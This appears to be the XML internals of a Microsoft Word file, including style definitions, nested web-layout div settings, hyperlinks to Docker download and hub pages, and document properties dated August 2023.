  <w15:docId w15:val="{4A02B3A5-0E0D-4A20-8609-49A4FCA1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0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092071"/>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092071"/>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071"/>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092071"/>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092071"/>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092071"/>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0920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2071"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00092071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0009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092071"/>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092071"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00092071"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00092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39936">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1600024970">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="644431462">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="18793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4145">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="750585932">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="16803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8667">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1037392170">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="10776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8962">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="481853156">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="14226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6484">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1126849128">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="19996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1402">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1282298327">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1669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884">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1905725627">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="637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0915">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="260994268">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="18335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3483">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1484273253">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="17459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ter.dockerproject.org/linux/x86_64/docker" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hub.do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2300</Words>
  <Characters>13116</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>109</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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2023-08-02T13:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-02T13:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>